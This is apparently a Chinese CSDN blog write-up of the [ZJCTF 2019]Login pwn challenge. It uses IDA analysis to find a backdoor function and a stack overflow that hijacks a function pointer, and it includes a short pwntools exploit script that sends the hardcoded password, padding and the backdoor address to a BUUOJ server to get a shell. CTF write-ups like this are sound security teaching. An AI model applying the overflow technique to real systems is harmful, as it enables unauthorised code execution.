[ZJCTF 2019]Login

于 2023-06-10 14:18:52 发布
阅读量74 收藏
点赞数
分类专栏: PWN 文章标签: pwn
cctrl
本文链接:https://blog.csdn.net/weixin_44309300/article/details/131141356
版权

1,
在这里插入图片描述思路:栈溢出题

2,ida
根据输出Nope,猜测程序判断密码是否正确输出,即存在if…else,判断函数如下:
在这里插入图片描述if…else内容如下:
在这里插入图片描述
输入正确即调用函数指针,因此找找看有没有后门函数
在这里插入图片描述找到了后门函数,我们还需要看看a1是否可控,回溯发现a1是参数v8,v8是password_checker(v3);的返回值:
在这里插入图片描述
溢出偏移:
在这里插入图片描述
偏移值:0x58

正确密码:
在这里插入图片描述
3,poc

from pwn  import *
context.log_level="debug"

r = remote("node4.buuoj.cn",26484)

sys_binsh=0x0000000000400E88


r.sendlineafter(': ','admin')

payload='2jctf_pa5sw0rd'+'\x00'*58+p64(sys_binsh)
r.sendlineafter(': ',payload)

r.interactive()

总结:
通过溢出控制函数指针

hercu1iz
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
[ZJCTF 2019]Login--动态调试--详细版
weixin_41748164的博客
11-21 637
全网最详细login的解析,包含静态和动态分析
CTF-PWN-[ZJCTF 2019]Login 栈位置的转换跟踪
serfend's blog
06-23 1357
来源:https://buuoj.cn/challenges内容:附件:链接:https://pan.baidu.com/s/1uBEYYeg9ouPDEOah-BHGQA?pwd=6si8 提取码:6si8答案:PWN题为动态flag使用安装pwn解题框架发现是cpp的题目,在password_checker的第9行下断点到判断密码的位置,随后输入用户名admin,密码cylic(300)用于测试溢出点和调用点题目是比较密码是否等于,正确则跳转进入 发现此处的值是aaaa,则我们将密码设置为 +cylic
[BUUCTF]PWN——[ZJCTF 2019]Login
mcmuyanga的博客
11-05 1653
[ZJCTF 2019]Login 附件 步骤: 例行检查,64位程序,开启了canary和nx保护 2. 试运行一下程序 3. 64位ida载入,检索字符串,在程序里找到了用户名admin和密码2jctf_pa5sw0rd 再次尝试登录,无果 在程序里找到了后门函数,backdoor=0x400e88 c++写的程序,看起来有点费劲,自己看了好久都找到漏洞在哪里,后来借鉴了其他师傅的wp后才发现了猫腻 问题出现在检查密码的那个函数上 反编译出来的伪代码看起来没什么问题 但是我们按下tab,
ZJCTF_2019_Login
z1r0的博客
12-12 2435
ZJCTF_2019_Login 查看保护 输入正确的密码和用户名,会发生错误,看一下汇编。 在crash之前call 了rax,逆一下找到rax被怎样赋值的。
BUUCTF-PWN-[ZJCTF 2019]Login
最新发布
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
LogIn_login_
10-02
Login simple web app
U8Login.dll
11-20
除了"U8Login.dll",压缩包中还包括了"UFSoft.U8.Framework.Login.UI.dll"文件,这是用友U8登录界面相关的UI框架库,包含了登录界面的控件和样式定义,使得开发者在自定义登录界面时能够保持与原系统风格的一致性。...
login.html
04-15
手机号 <input type="text" class="form-control" id="phone" placeholder="手机号" onblur="checkPhone()"> <div id="test_phone"></div> </div><!--/.form-group -->...input type="password" ...
yangzi_login
11-04
在"Yangzi_login"项目中,开发者可能使用了常见的UI框架,如Bootstrap或自定义CSS样式,来实现美观且功能齐全的界面。 其次,本地数据库的使用是该项目的核心。通常,开发人员会选择SQLite这样的轻量级数据库,因为...
login登录界面
08-08
document.getElementById('login-form').addEventListener('submit', function(event) { event.preventDefault(); // 阻止默认的表单提交行为 var username = document.getElementById('username').value; var ...
各版本 U8Login
07-26
【U8Login详解】 U8Login,作为用友U8系列软件的重要组成部分,是企业信息化管理中的关键登录入口。它提供了统一的身份认证、权限管理以及多系统集成等功能,旨在提升企业的运营效率,确保数据安全。在不同的版本中...
login.htmllogin.html
03-17
<div><label for="phone">手机号 <input type="text" class="form-control" id="phone" placeholder="手机号" onblur="checkPhone()"> <div id="test_phone"></div> </div><!--/.form-group -->...
开发工具 login 开发工具 login
05-31
开发工具 login开发工具 login开发工具 login开发工具 login开发工具 login开发工具 login开发工具 login开发工具 login开发工具 login开发工具 login开发工具 login开发工具 login开发工具 login开发工具 login开发...
暗色科幻风格login页面源码
10-21
暗色科幻风格的登录(login)页面源码是一种设计独特的用户界面,通常用于吸引科技爱好者和寻求独特用户体验的网站或应用程序。这种风格结合了深色调背景、未来感元素以及交互性设计,为用户提供沉浸式的登录体验。...
buuctf [ZJCTF 2019]Login
carol2358的博客
05-06 1107
先运行,输入admin和2jctf_pa5sw0rd, 发现报错,gdb开始调试 在这里crash了, 去ida里看 ida里自己改名字,原来的看着太乱 反向分析 在read_password里找到var_18 然后通过覆盖var_18, 让他跳到程序自带的shell里 60-18 = 48 e+3a = 48 exp: from pwn import * from LibcSearc...
BUU [ZJCTF 2019]Login
fzucaicai的博客
03-04 842
这是一道让我感觉很淦的题,整一天了才大致了解了来龙去脉。
2019-ZJCTF
ChenZIDu的博客
12-13 1104
浙江省大学生网络安全竞赛:逆转思路 这题当初没做出来,可惜了。 主要是php序列化,以及data协议。 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="w...
Pwn】SWPUCTF_2019_login
Nothing
12-09 1153
例行查看程序保护。 分析程序,最里面函数存在格式化字符串漏洞。但是格式化字符串不再栈上,而在bss段上,没办法直接任意地址读写,于是动态调试观察栈上数据。 观察到fff65158指向fff65168,fff65168指向fff65178。那么就可以修改fff65168的内容,然后再观察栈上还有什么有用数据,注意到fff65160和fff65164的值离got表很近,于是想到可以修改这两个地方的后...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值